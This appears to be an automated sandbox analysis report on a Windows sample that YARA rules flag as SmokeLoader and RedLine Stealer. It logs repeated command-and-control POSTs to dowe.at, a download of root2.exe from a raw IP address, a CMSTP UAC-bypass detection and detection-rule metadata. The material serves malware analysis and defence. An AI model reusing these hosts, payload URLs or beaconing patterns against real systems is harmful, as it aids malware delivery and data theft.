                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifardcruc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gbbshbjmpq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dkguxo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frdxrq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plraoc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://panajd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://queeh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lvqyks.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oidcj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljwdjes.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bajxyhac.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbxsgv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xjvagowrnc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ueuounaic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vhxqowscaf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqdpmu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxslssk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbdses.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxvmoh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hlixtq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bymgj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jviyq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://papeicwkil.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csplko.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecwfh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://avfvrfo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ouqhut.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amjtlofw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mrgphm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: dowe.at
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: WerFault.exe, 00000013.00000003.544336242.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000002.555779726.0000000004B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: explorer.exe, 00000001.00000000.338958128.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.291794851.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.322078451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.303824435.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.269421946.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.258393076.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tajcoxqjmd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: dowe.at
                Source: unknownDNS traffic detected: queries for: dowe.at
                Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
                Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
                Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.6:49739 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 0.2.file.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.3.dfhwrav.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.dfhwrav.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.dfhwrav.6d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: dfhwrav, 00000009.00000002.385029493.00000000006EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: Yara matchFile source: Process Memory Space: ADCA.exe PID: 1432, type: MEMORYSTR

                System Summary

                barindex
                Source: 16.2.5AF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 22.2.5AF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.339969412.0000000000509000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000016.00000002.521716515.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000016.00000002.518252636.000000000059E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000010.00000002.495741535.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000A.00000002.503903306.0000000002950000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 16.2.5AF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 22.2.5AF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.339969412.0000000000509000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000016.00000002.521716515.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000016.00000002.518252636.000000000059E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000010.00000002.495741535.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000A.00000002.503903306.0000000002950000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00881940
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00897244
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00885B34
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_008770C4
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_006BA8DC
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00889622
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0088C79C
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: String function: 0040ACB4 appears 34 times
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: String function: 0040A3C0 appears 76 times
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: String function: 0040A0C0 appears 300 times
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: String function: 0040AEFC appears 33 times
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014CF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401400 NtAllocateVirtualMemory,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401501 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
